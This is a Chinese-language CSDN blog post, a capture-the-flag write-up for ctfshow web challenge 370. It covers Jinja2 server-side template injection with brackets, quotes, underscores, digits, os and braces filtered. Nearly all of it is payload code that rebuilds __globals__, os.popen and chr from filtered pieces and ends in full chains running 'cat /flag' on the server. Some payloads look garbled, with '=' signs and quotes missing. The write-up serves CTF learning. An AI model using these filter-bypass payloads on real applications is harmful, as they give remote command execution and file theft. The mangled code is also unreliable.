北京网站建设公司华网天下优惠,翻译网页,自贡企业网站建设公司,分销系统SSTI模板注入-中括号、args、下划线、单双引号、os、request、花括号、数字被过滤绕过#xff08;ctfshow web入门370#xff09;-CSDN博客
ssti板块注入
正好不会 {%%}的内容 学习一下 经过测试 发现过滤了 {{}}
那么我们就开始吧
我们可以通过这个语句来查询是否存在ss…SSTI模板注入-中括号、args、下划线、单双引号、os、request、花括号、数字被过滤绕过ctfshow web入门370-CSDN博客
ssti板块注入
正好不会 {%%}的内容 学习一下 经过测试 发现过滤了 {{}}
那么我们就开始吧
我们可以通过这个语句来查询是否存在ssti
{%if 条件%}result{%endif%}解释一下 如果条件里为真 就输出 result 否则不输出修改一下
{%if not a%}yes{%endif%}第二种{%print 123%}通过输出123来判断 存在咯
这里跟着师傅的wp走 他那边过滤了数字 我们也来看看
获取数字
{%set onedict(ca)|join|count%}{%set twodict(cca)|join|count%}{%set threedict(ccca)|join|count%}这里就可以获取数字
但是这道题不需要
然后我们首先确定一下我们需要的payload
(lipsum|attr(__globals__).get(os).popen(cat /flag).read()这个时候我们需要获取_通过lipsum|string|list
这个时候可以通过 pop方法 获取_
先需要获取pop
pop方法可以根据索引值来删除列中的某个元素并将该元素返回值返回。
{%set popdict(popa)|join%} {%set onedict(ca)|join|count%}
{%set twodict(cca)|join|count%}
{%set threedict(ccca)|join|count%}
{%set fourdict(cccca)|join|count%}
{%set fivedict(ccccca)|join|count%}
{%set sixdict(cccccca)|join|count%}
{%set sevendict(ccccccca)|join|count%}
{%set eightdict(cccccccca)|join|count%}
{%set ninedict(ccccccccca)|join|count%}
{%set popdict(popa)|join%}
{%set xiahuaxian(lipsum|string|list)%}{%print xiahuaxian%}然后我们数 可以发现 _ 在24 所以我们索引即可{%set onedict(ca)|join|count%}
{%set twodict(cca)|join|count%}
{%set threedict(ccca)|join|count%}
{%set fourdict(cccca)|join|count%}
{%set fivedict(ccccca)|join|count%}
{%set sixdict(cccccca)|join|count%}
{%set sevendict(ccccccca)|join|count%}
{%set eightdict(cccccccca)|join|count%}
{%set ninedict(ccccccccca)|join|count%}
{%set popdict(popa)|join%}
{%set xiahuaxian(lipsum|string|list)|attr(pop)(three*eight)%}{%print xiahuaxian%} 成功获取
然后获取golbals
name{%set onedict(ca)|join|count%}
{%set twodict(cca)|join|count%}
{%set threedict(ccca)|join|count%}
{%set fourdict(cccca)|join|count%}
{%set fivedict(ccccca)|join|count%}
{%set sixdict(cccccca)|join|count%}
{%set sevendict(ccccccca)|join|count%}
{%set eightdict(cccccccca)|join|count%}
{%set ninedict(ccccccccca)|join|count%}
{%set popdict(popa)|join%}
{%set xiahuaxian(lipsum|string|list)|attr(pop)(three*eight)%}
{%set globals(xiahuaxian,xiahuaxian,dict(globalsa)|join,xiahuaxian,xiahuaxian)|join%}
{%print globals%} 获取os
首先需要获取get
{%set getdict(geta)|join%}{%print get%}
然后
然后我们可以获取os
{%set shelldict(oa,sb)|join%}{%print shell%} 获取popen
{%set popendict(popa,enb)|join%}{%print popen%} 过滤了 改名字就可以了
{%set onedict(ca)|join|count%}
{%set twodict(cca)|join|count%}
{%set threedict(ccca)|join|count%}
{%set fourdict(cccca)|join|count%}
{%set fivedict(ccccca)|join|count%}
{%set sixdict(cccccca)|join|count%}
{%set sevendict(ccccccca)|join|count%}
{%set eightdict(cccccccca)|join|count%}
{%set ninedict(ccccccccca)|join|count%}
{%set popdict(popa)|join%}
{%set xiahuaxian(lipsum|string|list)|attr(pop)(three*eight)%}
{%set globals(xiahuaxian,xiahuaxian,dict(globalsa)|join,xiahuaxian,xiahuaxian)|join%}
{%set getdict(geta)|join%}
{%set shelldict(oa,sb)|join%}
{%set ppdict(poa,penb)|join%}
{%print lipsum|attr(globals)|attr(get)(shell)|attr(pp)%}成功获取咯
获取chr
首先要获取__builtins__ {%set onedict(ca)|join|count%}
{%set twodict(cca)|join|count%}
{%set threedict(ccca)|join|count%}
{%set fourdict(cccca)|join|count%}
{%set fivedict(ccccca)|join|count%}
{%set sixdict(cccccca)|join|count%}
{%set sevendict(ccccccca)|join|count%}
{%set eightdict(cccccccca)|join|count%}
{%set ninedict(ccccccccca)|join|count%}
{%set popdict(popa)|join%}
{%set xiahuaxian(lipsum|string|list)|attr(pop)(three*eight)%}
{%set globals(xiahuaxian,xiahuaxian,dict(globalsa)|join,xiahuaxian,xiahuaxian)|join%}
{%set getdict(geta)|join%}
{%set shelldict(oa,sb)|join%}
{%set ppdict(poa,penb)|join%}
{%set builtins(xiahuaxian,xiahuaxian,dict(builtinsa)|join,xiahuaxian,xiahuaxian)|join%}
{%print builtins%}获取chr {%set onedict(ca)|join|count%}
{%set twodict(cca)|join|count%}
{%set threedict(ccca)|join|count%}
{%set fourdict(cccca)|join|count%}
{%set fivedict(ccccca)|join|count%}
{%set sixdict(cccccca)|join|count%}
{%set sevendict(ccccccca)|join|count%}
{%set eightdict(cccccccca)|join|count%}
{%set ninedict(ccccccccca)|join|count%}
{%set popdict(popa)|join%}
{%set xiahuaxian(lipsum|string|list)|attr(pop)(three*eight)%}
{%set globals(xiahuaxian,xiahuaxian,dict(globalsa)|join,xiahuaxian,xiahuaxian)|join%}
{%set getdict(geta)|join%}
{%set shelldict(oa,sb)|join%}
{%set ppdict(poa,penb)|join%}
{%set builtins(xiahuaxian,xiahuaxian,dict(builtinsa)|join,xiahuaxian,xiahuaxian)|join%}
{%set char(lipsum|attr(globals))|attr(get)(builtins)|attr(get)(dict(chra)|join)%}
{%print char%} 成功
然后就是通过char拼接命令
?name{%set onedict(ca)|join|count%}
{%set twodict(cca)|join|count%}
{%set threedict(ccca)|join|count%}
{%set fourdict(cccca)|join|count%}
{%set fivedict(ccccca)|join|count%}
{%set sixdict(cccccca)|join|count%}
{%set sevendict(ccccccca)|join|count%}
{%set eightdict(cccccccca)|join|count%}
{%set ninedict(ccccccccca)|join|count%}
{%set popdict(popa)|join%}
{%set xiahuaxian(lipsum|string|list)|attr(pop)(three*eight)%}
{%set globals(xiahuaxian,xiahuaxian,dict(globalsa)|join,xiahuaxian,xiahuaxian)|join%}
{%set%20getdict(geta)|join%}
{%set builtins(xiahuaxian,xiahuaxian,dict(builtinsa)|join,xiahuaxian,xiahuaxian)|join%}
{%set char(lipsum|attr(globals))|attr(get)(builtins)|attr(get)(dict(chra)|join)%}
{%set commandchar(five*five*four-one)%2bchar(five*five*four-three)%2bchar(four*five*six-four)%2bchar(four*eight)%2bchar(six*eight-one)%2bchar(three*six*six-six)%2bchar(three*six*six)%2bchar(five*five*four-three)%2bchar(three*six*six-five)%}
{%print command%}然后就是获取read
获取read
name{%set readdict(reada)|join%}{%print read%}
最后就是拼接执行命令
name{%set onedict(ca)|join|count%}
{%set twodict(cca)|join|count%}
{%set threedict(ccca)|join|count%}
{%set fourdict(cccca)|join|count%}
{%set fivedict(ccccca)|join|count%}
{%set sixdict(cccccca)|join|count%}
{%set sevendict(ccccccca)|join|count%}
{%set eightdict(cccccccca)|join|count%}
{%set ninedict(ccccccccca)|join|count%}
{%set popdict(popa)|join%}
{%set xiahuaxian(lipsum|string|list)|attr(pop)(three*eight)%}
{%set globals(xiahuaxian,xiahuaxian,dict(globalsa)|join,xiahuaxian,xiahuaxian)|join%}
{%set getdict(geta)|join%}
{%set shelldict(oa,sb)|join%}
{%set ppdict(poa,penb)|join%}
{%set builtins(xiahuaxian,xiahuaxian,dict(builtinsa)|join,xiahuaxian,xiahuaxian)|join%}
{%set char(lipsum|attr(globals))|attr(get)(builtins)|attr(get)(dict(chra)|join)%}
{%set commandchar(five*five*four-one)%2bchar(five*five*four-three)%2bchar(four*five*six-four)%2bchar(four*eight)%2bchar(six*eight-one)%2bchar(three*six*six-six)%2bchar(three*six*six)%2bchar(five*five*four-three)%2bchar(three*six*six-five)%}
{%set readdict(reada)|join%}{%print (lipsum|attr(globals))|attr(get)(shell)|attr(pp)(command)|attr(read)()%}确实学到了 但是这个太麻烦了 这个是很极端的我们这道题没有过滤这么多
正常来
{% set popdict(pop1)|join %} {% set kong(lipsum|string|list)|attr(pop)(9) %}{% set xhx(lipsum|string|list)|attr(pop)(18) %}{% set re(config|string|list)|attr(pop)(239) %}{% set globals(xhx,xhx,dict(globalsa)|join,xhx,xhx)|join %}{% set geti(xhx,xhx,dict(geta,itemb)|join,xhx,xhx)|join %}{% set odict(oa,sb)|join %}{% set podict(popa,enb)|join %}{% set cmd(dict(cata)|join,kong,re,dict(flaga)|join)|join %}{% set readdict(reada)|join %}{% print(lipsum|attr(globals)|attr(geti)(o)|attr(po)(cmd)|attr(read)()) %}这里原型是lipsum.__globals__.getitem[os].popen(cat flag).read()类似于这种 真是一个恐怖的ssti
